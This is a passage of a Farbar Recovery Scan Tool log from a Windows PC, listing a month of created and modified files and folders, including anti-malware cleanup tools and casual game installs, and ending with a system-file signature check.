==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-03 04:10 - 2014-08-03 04:10 - 00009941 _____ () C:\Users\Ice\Desktop\FRST.txt
2014-08-03 03:24 - 2014-08-03 03:26 - 00012152 _____ () C:\Users\Ice\Desktop\dds.txt
2014-08-03 03:24 - 2014-08-03 03:26 - 00006754 _____ () C:\Users\Ice\Desktop\attach.txt
2014-08-03 03:17 - 2014-08-03 03:17 - 00000000 ____D () C:\Users\Ice\Desktop\New folder
2014-08-03 03:02 - 2014-08-03 03:02 - 00688992 ____R (Swearware) C:\Users\Ice\Desktop\dds.com
2014-08-02 21:57 - 2014-08-02 21:57 - 00001924 _____ () C:\Users\Ice\Desktop\JRT.txt
2014-08-02 21:52 - 2014-08-02 21:52 - 00000000 ____D () C:\Windows\ERUNT
2014-08-02 21:51 - 2014-08-02 21:51 - 00012872 _____ (SurfRight B.V.) C:\Windows\system32\bootdelete.exe
2014-08-02 21:41 - 2014-08-02 21:41 - 00000000 ____D () C:\Users\Ice\AppData\Local\CrashDumps
2014-08-02 21:34 - 2014-08-02 23:24 - 00029160 _____ () C:\Windows\SysWOW64\Drivers\TrueSight.sys
2014-08-02 21:34 - 2014-08-02 21:34 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-08-02 21:33 - 2014-08-02 21:34 - 04806744 _____ () C:\Users\Ice\Desktop\RogueKiller.exe
2014-08-02 21:24 - 2014-08-02 23:22 - 00065253 _____ () C:\Users\Ice\Desktop\Shortcut.txt
2014-08-02 21:23 - 2014-08-02 23:22 - 00032874 _____ () C:\Users\Ice\Desktop\Addition.txt
2014-08-02 20:41 - 2014-08-02 20:41 - 01016261 _____ (Thisisu) C:\Users\Ice\Desktop\JRT.exe
2014-08-02 20:41 - 2014-08-02 20:41 - 00000000 ____D () C:\Users\Ice\Desktop\RK_Quarantine
2014-08-02 20:40 - 2014-08-03 04:10 - 00000000 ____D () C:\FRST
2014-08-02 20:40 - 2014-08-02 20:40 - 02094080 _____ (Farbar) C:\Users\Ice\Desktop\FarBar.exe
2014-08-02 20:21 - 2014-08-02 20:21 - 00005338 _____ () C:\Windows\system32\.crusader
2014-08-02 19:30 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-08-02 19:28 - 2014-08-02 19:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
2014-08-02 19:26 - 2014-08-02 20:21 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-02 19:26 - 2014-08-02 19:28 - 00001859 _____ () C:\Users\Public\Desktop\HitmanPro.lnk
2014-08-02 19:26 - 2014-08-02 19:26 - 00000000 ____D () C:\Program Files\HitmanPro
2014-08-02 19:25 - 2014-08-02 19:26 - 11188736 _____ (SurfRight B.V.) C:\Users\Ice\Downloads\HitmanPro_x64.exe
2014-08-02 19:24 - 2014-08-02 23:18 - 00000000 ____D () C:\AdwCleaner
2014-08-02 19:24 - 2014-08-02 19:24 - 01361309 _____ () C:\Users\Ice\Desktop\adwcleaner_3.302.exe
2014-08-02 19:19 - 2014-08-02 19:19 - 00000000 ____D () C:\Users\Ice\Desktop\Old Firefox Data
2014-08-02 19:04 - 2014-08-03 03:16 - 00000560 _____ () C:\Windows\setupact.log
2014-08-02 19:04 - 2014-08-02 19:04 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-02 17:21 - 2014-08-03 03:16 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-02 17:20 - 2014-08-02 17:20 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-02 17:20 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-02 17:06 - 2014-08-03 03:15 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Lavasoft
2014-08-02 16:59 - 2014-08-02 16:59 - 00000000 ____D () C:\ProgramData\BitDefender
2014-08-02 16:56 - 2014-08-02 16:56 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Weather Alerts
2014-08-02 16:55 - 2014-08-02 16:55 - 00000000 ____D () C:\Program Files\Lavasoft
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iPod
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files\Bonjour
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files (x86)\Bonjour
2014-07-26 20:05 - 2014-07-26 20:05 - 00003138 _____ () C:\Windows\System32\Tasks\{3189C8A5-3697-42A7-B610-24848AA251A5}
2014-07-23 15:29 - 2014-08-02 16:45 - 00000000 ____D () C:\ProgramData\1d41b52c7ef528a8
2014-07-23 15:29 - 2014-07-23 15:29 - 00000258 __RSH () C:\ProgramData\ntuser.pol
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Packages
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator
2014-07-22 16:24 - 2014-07-22 16:25 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-07-17 10:07 - 2014-07-17 10:07 - 00000000 ____D () C:\ProgramData\Riot Games
2014-07-12 01:26 - 2014-07-12 01:27 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:25 - 2014-07-12 01:25 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\bigfishgames_p215946498_s1_l1.exe
2014-07-11 22:37 - 2014-07-11 22:37 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Rainbow
2014-07-11 21:03 - 2014-07-11 21:04 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:02 - 2014-07-11 21:02 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Digital Quarter
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Goblin Kingdom
2014-07-11 19:45 - 2014-07-11 19:45 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Nevosoft
2014-07-11 15:44 - 2014-07-11 15:44 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\LestaStudio
2014-07-11 12:16 - 2014-07-11 12:16 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Program Files (x86)\Awakening - Moonfell Wood
2014-07-11 09:35 - 2014-07-11 09:36 - 00000000 ____D () C:\Program Files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:34 - 2014-07-11 09:35 - 00000000 ____D () C:\Program Files (x86)\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Program Files (x86)\Northern Tale
2014-07-11 09:31 - 2014-07-11 09:32 - 00000000 ____D () C:\Program Files (x86)\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\awakening-the-dreamless-castle_s1_l1_gF5471T1L1_d2331467785.exe
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:24 - 2014-07-11 09:25 - 00000000 ____D () C:\Program Files (x86)\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-03 04:10 - 2014-08-03 04:10 - 00009941 _____ () C:\Users\Ice\Desktop\FRST.txt
2014-08-03 04:10 - 2014-08-02 20:40 - 00000000 ____D () C:\FRST
2014-08-03 03:47 - 2014-02-22 16:24 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-03 03:39 - 2013-10-18 11:34 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-08-03 03:27 - 2014-03-21 02:19 - 00000000 ____D () C:\Users\Ice\Documents\My PSP8 Files
2014-08-03 03:26 - 2014-08-03 03:24 - 00012152 _____ () C:\Users\Ice\Desktop\dds.txt
2014-08-03 03:26 - 2014-08-03 03:24 - 00006754 _____ () C:\Users\Ice\Desktop\attach.txt
2014-08-03 03:23 - 2009-07-13 23:45 - 00021072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-03 03:23 - 2009-07-13 23:45 - 00021072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-03 03:19 - 2011-08-18 19:06 - 00997283 _____ () C:\Windows\WindowsUpdate.log
2014-08-03 03:17 - 2014-08-03 03:17 - 00000000 ____D () C:\Users\Ice\Desktop\New folder
2014-08-03 03:16 - 2014-08-02 19:04 - 00000560 _____ () C:\Windows\setupact.log
2014-08-03 03:16 - 2014-08-02 17:21 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-03 03:16 - 2014-02-22 16:26 - 00000000 ___RD () C:\Users\Ice\Google Drive
2014-08-03 03:16 - 2014-02-22 16:24 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-03 03:16 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-03 03:15 - 2014-08-02 17:06 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Lavasoft
2014-08-03 03:02 - 2014-08-03 03:02 - 00688992 ____R (Swearware) C:\Users\Ice\Desktop\dds.com
2014-08-02 23:24 - 2014-08-02 21:34 - 00029160 _____ () C:\Windows\SysWOW64\Drivers\TrueSight.sys
2014-08-02 23:22 - 2014-08-02 21:24 - 00065253 _____ () C:\Users\Ice\Desktop\Shortcut.txt
2014-08-02 23:22 - 2014-08-02 21:23 - 00032874 _____ () C:\Users\Ice\Desktop\Addition.txt
2014-08-02 23:19 - 2010-11-20 22:47 - 00273104 _____ () C:\Windows\PFRO.log
2014-08-02 23:18 - 2014-08-02 19:24 - 00000000 ____D () C:\AdwCleaner
2014-08-02 22:21 - 2013-06-19 20:26 - 00000000 ____D () C:\Users\Ice\AppData\Local\Deployment
2014-08-02 21:57 - 2014-08-02 21:57 - 00001924 _____ () C:\Users\Ice\Desktop\JRT.txt
2014-08-02 21:52 - 2014-08-02 21:52 - 00000000 ____D () C:\Windows\ERUNT
2014-08-02 21:51 - 2014-08-02 21:51 - 00012872 _____ (SurfRight B.V.) C:\Windows\system32\bootdelete.exe
2014-08-02 21:41 - 2014-08-02 21:41 - 00000000 ____D () C:\Users\Ice\AppData\Local\CrashDumps
2014-08-02 21:34 - 2014-08-02 21:34 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-08-02 21:34 - 2014-08-02 21:33 - 04806744 _____ () C:\Users\Ice\Desktop\RogueKiller.exe
2014-08-02 20:42 - 2009-07-14 00:32 - 00000000 ____D () C:\Windows\Performance
2014-08-02 20:41 - 2014-08-02 20:41 - 01016261 _____ (Thisisu) C:\Users\Ice\Desktop\JRT.exe
2014-08-02 20:41 - 2014-08-02 20:41 - 00000000 ____D () C:\Users\Ice\Desktop\RK_Quarantine
2014-08-02 20:40 - 2014-08-02 20:40 - 02094080 _____ (Farbar) C:\Users\Ice\Desktop\FarBar.exe
2014-08-02 20:21 - 2014-08-02 20:21 - 00005338 _____ () C:\Windows\system32\.crusader
2014-08-02 20:21 - 2014-08-02 19:26 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-02 19:28 - 2014-08-02 19:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
2014-08-02 19:28 - 2014-08-02 19:26 - 00001859 _____ () C:\Users\Public\Desktop\HitmanPro.lnk
2014-08-02 19:26 - 2014-08-02 19:26 - 00000000 ____D () C:\Program Files\HitmanPro
2014-08-02 19:26 - 2014-08-02 19:25 - 11188736 _____ (SurfRight B.V.) C:\Users\Ice\Downloads\HitmanPro_x64.exe
2014-08-02 19:24 - 2014-08-02 19:24 - 01361309 _____ () C:\Users\Ice\Desktop\adwcleaner_3.302.exe
2014-08-02 19:19 - 2014-08-02 19:19 - 00000000 ____D () C:\Users\Ice\Desktop\Old Firefox Data
2014-08-02 19:06 - 2013-06-07 22:08 - 00000000 ____D () C:\Users\Ice\Desktop\Current
2014-08-02 19:04 - 2014-08-02 19:04 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-02 17:20 - 2014-08-02 17:20 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-08-02 17:20 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-02 17:20 - 2014-02-22 18:03 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Malwarebytes
2014-08-02 17:20 - 2014-02-22 18:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-02 17:18 - 2013-08-12 15:47 - 00000000 ____D () C:\Windows\Minidump
2014-08-02 17:05 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-08-02 16:59 - 2014-08-02 16:59 - 00000000 ____D () C:\ProgramData\BitDefender
2014-08-02 16:56 - 2014-08-02 16:56 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Weather Alerts
2014-08-02 16:55 - 2014-08-02 16:55 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-02 16:45 - 2014-07-23 15:29 - 00000000 ____D () C:\ProgramData\1d41b52c7ef528a8
2014-08-02 12:01 - 2013-06-07 19:50 - 00000422 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-08-02 12:00 - 2013-06-09 12:00 - 00003488 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-08-02 12:00 - 2013-06-07 19:50 - 00003446 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iTunes
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files\iPod
2014-07-31 23:32 - 2014-07-31 23:32 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files\Bonjour
2014-07-31 23:30 - 2014-07-31 23:30 - 00000000 ____D () C:\Program Files (x86)\Bonjour
2014-07-27 14:39 - 2013-06-07 19:50 - 00000564 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-07-26 20:07 - 2013-08-22 07:18 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\SoftGrid Client
2014-07-26 20:07 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-07-26 20:06 - 2013-06-07 20:18 - 00001165 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-07-26 20:06 - 2013-06-07 19:50 - 00001449 _____ () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-26 20:06 - 2013-06-07 19:50 - 00001375 _____ () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-07-26 20:05 - 2014-07-26 20:05 - 00003138 _____ () C:\Windows\System32\Tasks\{3189C8A5-3697-42A7-B610-24848AA251A5}
2014-07-26 20:05 - 2014-01-17 23:51 - 00000000 ____D () C:\Users\Ice\AppData\Local\Battle.net
2014-07-26 20:05 - 2014-01-17 23:50 - 00000000 ____D () C:\Program Files (x86)\Battle.net
2014-07-26 01:00 - 2013-06-07 19:50 - 00004266 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-07-23 22:29 - 2014-01-17 23:51 - 00000000 ____D () C:\Program Files (x86)\Hearthstone
2014-07-23 15:33 - 2013-06-07 20:18 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-07-23 15:29 - 2014-07-23 15:29 - 00000258 __RSH () C:\ProgramData\ntuser.pol
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Packages
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Ice\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\HomeGroupUser$
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Guest
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Google
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Comodo
2014-07-23 15:29 - 2014-07-23 15:29 - 00000000 ____D () C:\Users\Administrator
2014-07-23 15:29 - 2014-02-22 16:24 - 00000000 ____D () C:\Users\Ice\AppData\Local\Google
2014-07-23 15:29 - 2014-02-22 16:24 - 00000000 ____D () C:\Program Files (x86)\Google
2014-07-23 15:29 - 2009-07-13 22:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-07-23 15:29 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\GroupPolicy
2014-07-23 15:02 - 2013-06-07 22:24 - 00000000 ____D () C:\Users\Ice\My Books
2014-07-22 16:25 - 2014-07-22 16:24 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-07-18 05:36 - 2011-08-18 19:22 - 00000000 ____D () C:\ProgramData\Temp
2014-07-17 10:07 - 2014-07-17 10:07 - 00000000 ____D () C:\ProgramData\Riot Games
2014-07-12 01:27 - 2014-07-12 01:26 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:26 - 2014-07-12 01:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Sunhook Spire
2014-07-12 01:25 - 2014-07-12 01:25 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\bigfishgames_p215946498_s1_l1.exe
2014-07-12 00:37 - 2013-08-30 23:27 - 00000000 ____D () C:\Program Files (x86)\Rush for Gold - Alaska
2014-07-11 22:37 - 2014-07-11 22:37 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Rainbow
2014-07-11 21:04 - 2014-07-11 21:03 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:03 - 2014-07-11 21:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Skyward Castle
2014-07-11 21:02 - 2014-07-11 21:02 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Digital Quarter
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - The Goblin Kingdom
2014-07-11 20:57 - 2014-07-11 20:57 - 00000000 ____D () C:\Program Files (x86)\Awakening - The Goblin Kingdom
2014-07-11 19:45 - 2014-07-11 19:45 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Nevosoft
2014-07-11 15:44 - 2014-07-11 15:44 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\LestaStudio
2014-07-11 12:16 - 2014-07-11 12:16 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 11:40 - 2014-06-11 02:10 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Boomzap
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:36 - 00000000 ____D () C:\Program Files (x86)\Awakening - Moonfell Wood
2014-07-11 09:36 - 2014-07-11 09:35 - 00000000 ____D () C:\Program Files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amulet of Time - Shadow of la Rochelle
2014-07-11 09:35 - 2014-07-11 09:34 - 00000000 ____D () C:\Program Files (x86)\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:34 - 2014-07-11 09:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Awakening Kingdoms
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:32 - 00000000 ____D () C:\Program Files (x86)\Northern Tale
2014-07-11 09:32 - 2014-07-11 09:31 - 00000000 ____D () C:\Program Files (x86)\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00237568 _____ (Big Fish Games) C:\Users\Ice\Downloads\awakening-the-dreamless-castle_s1_l1_gF5471T1L1_d2331467785.exe
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:31 - 2014-07-11 09:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Royal Envoy 3
2014-07-11 09:25 - 2014-07-11 09:24 - 00000000 ____D () C:\Program Files (x86)\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery
2014-07-11 09:24 - 2014-07-11 09:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dark Manor - A Hidden Object Mystery
2014-07-11 00:16 - 2013-06-17 07:53 - 00000000 ____D () C:\Users\Ice\AppData\Roaming\Skype
2014-07-08 20:39 - 2013-10-18 11:34 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-07-08 20:39 - 2013-06-07 20:57 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-07-08 20:39 - 2011-08-18 19:08 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-07-08 13:47 - 2014-02-22 16:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
